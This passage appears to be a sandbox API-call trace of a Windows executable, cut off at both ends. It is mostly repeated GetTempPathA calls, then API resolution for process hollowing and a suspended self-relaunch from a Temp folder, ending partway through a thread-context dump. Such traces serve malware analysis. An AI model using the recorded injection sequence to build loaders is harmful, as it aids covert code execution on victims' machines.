| out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.304] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.304] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.304] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.304] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.304] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.304] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.307] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.307] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.307] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.307] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.307] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.307] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.307] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.307] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.307] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.307] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.307] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.472] VirtualProtect (in: lpAddress=0x1d3540, dwSize=0x564a0, flNewProtect=0x40, lpflOldProtect=0x12fe48 | out: lpflOldProtect=0x12fe48*=0x4) returned 1 [0108.473] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0108.473] LoadLibraryA (lpLibFileName="user32") returned 0x76b40000 [0108.473] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0108.473] LoadLibraryA (lpLibFileName="kernel32") returned 0x76910000 [0108.473] GetProcAddress (hModule=0x76910000, lpProcName="WinExec") returned 0x7699e5fd [0108.473] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileA") returned 0x7695cee8 [0108.474] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0108.474] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0108.474] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessA") returned 0x76912082 [0108.474] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadContext") returned 0x76970cc1 [0108.474] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0108.474] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAllocEx") returned 0x7694c1b6 [0108.474] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0108.474] GetProcAddress (hModule=0x76910000, lpProcName="ReadProcessMemory") returned 0x7694c1ce [0108.474] GetProcAddress (hModule=0x76910000, lpProcName="WriteProcessMemory") returned 0x7694c1de [0108.474] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadContext") returned 0x769a0193 [0108.474] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0108.474] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0108.474] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameA") returned 0x769633f6 [0108.474] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineA") returned 0x769698ff [0108.474] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77230000 [0108.474] GetProcAddress (hModule=0x77230000, lpProcName="NtUnmapViewOfSection") returned 0x772769b8 [0108.474] GetProcAddress (hModule=0x76b40000, lpProcName="RegisterClassExA") returned 0x76b46293 [0108.475] GetProcAddress (hModule=0x76b40000, lpProcName="CreateWindowExA") returned 0x76b4bf40 [0108.475] GetProcAddress (hModule=0x76b40000, lpProcName="PostMessageA") returned 0x76b4b446 [0108.475] GetProcAddress (hModule=0x76b40000, lpProcName="GetMessageA") returned 0x76b51899 [0108.475] GetProcAddress (hModule=0x76b40000, lpProcName="DefWindowProcA") returned 0x76b4bb1c [0108.475] RegisterClassExA (param_1=0x12fbc0) returned 0xc13d [0108.475] CreateWindowExA (dwExStyle=0x200, lpClassName="bxVV7cGHPHusOnmHbFKqGnzKMpomaw", lpWindowName="ptodEzQlWskupc762Nhc3wjD8apfHQ", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x7019a [0108.701] PostMessageA (hWnd=0x7019a, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0108.701] GetMessageA (in: lpMsg=0x12fbf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x12fbf0) returned 1 [0108.702] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x390000 [0108.702] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x390000, nSize=0x2800 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\f8a3iwa6.exe")) returned 0x30 [0108.702] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"" [0108.702] CreateProcessA (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12faf0*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb48 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"", lpProcessInformation=0x12fb48*(hProcess=0x4c, hThread=0x48, dwProcessId=0xcc0, dwThreadId=0xcc4)) returned 1 [0108.704] VirtualFree (lpAddress=0x390000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0108.704] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x390000 [0108.704] GetThreadContext (in: hThread=0x48, lpContext=0x390000 | out: lpContext=0x390000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdf000, Edx=0x0, Ecx=0x0, Eax=0x402581, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, 